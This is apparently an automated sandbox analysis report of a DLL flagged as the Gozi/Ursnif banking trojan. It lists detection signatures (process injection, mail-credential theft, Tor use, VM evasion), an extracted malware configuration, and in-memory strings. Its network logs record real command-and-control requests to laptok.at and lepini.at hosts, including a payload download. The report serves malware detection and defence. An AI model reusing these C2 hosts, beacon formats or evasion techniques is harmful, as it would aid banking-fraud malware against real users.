Analysis Report earmarkavchd

Overview

General Information

Sample Name: earmarkavchd (renamed file extension from none to dll)
Analysis ID: 321067
MD5: 78b3444199a2932805d85cfdb30ad6fb
SHA1: a1826a8bdd4aa6fc0bf2157a6063cca5534a3a46
SHA256: 66eaf5c2bc2ec2a01d74db9cc50744c748388cd9b0fa1f07181e639e128803ef

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: earmarkavchd.dll Avira: detected
Found malware configuration
Source: loaddll32.exe.4396.0.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: earmarkavchd.dll ReversingLabs: Detection: 45%
Machine Learning detection for sample
Source: earmarkavchd.dll Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_02813DEE
Source: C:\Windows\explorer.exe Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 29_2_03B791A0
Source: C:\Windows\explorer.exe Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 29_2_03B537B8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02831C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_02831C05

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44 47.241.19.44
Source: global traffic HTTP traffic detected: GET /api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVljDCJ/ih2L1Bdz8irJ/_2F8lSRByE0/SM6_2BP71LZESU/h3tJD1hVHbKiwkwE2IeWs/IizA7p6En4mCz2WA/NXpt5f6m6Jvf3pc/Mrs5oQ_2FPRoyih4jN/nKDhf733I/JOO4yWaqPLDk_2FATWs4/au98UO6brkA9iK_2BJ2/m2zSLNazAj56j867SYe4xl/cUNEATTbA9T6H/G_0A_0DY/h1e_2Bl0ZjLJIZf95sH7_2B/vbmm46cNio/kWkp8HAde3SsZyg36/ZN_2BmnjrWTcHtn/70R8a3b9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7/71DFI8PUSCc4m/XMwm02nY/k4iLrUAYDDvtv52BcxN4JBR/mhz_2Ft8VK/cNDRoyaxMsIxwxiz7/z7UQYEM6OBEY/IsC_2BO60JP/8DQpEZ9_2FIB1d/I_2FlPwkTE_2BidQ3R_2F/R3ia9KhwObxc1lnS/i7zxvyPIE4qo3ur/Ak3ONUjFI0trLtGmdw/2_2B5VotK/XxvvgQefWGm6F_0A_0Dg/2ryULZlOS2cT7CbqIGS/McMh6tWsIGNL2hue3Skqhq/rpuSb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:40:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/ap
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNAAZYZ
Source: explorer.exe, 0000001D.00000000.388307908.000000000891C000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVlj
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_
Source: explorer.exe, 0000001D.00000000.392738198.000000000DC5F000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWT
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.388809444.0000000008B54000.00000004.00000001.sdmp String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000013.00000003.369200959.0000022F9DAA8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
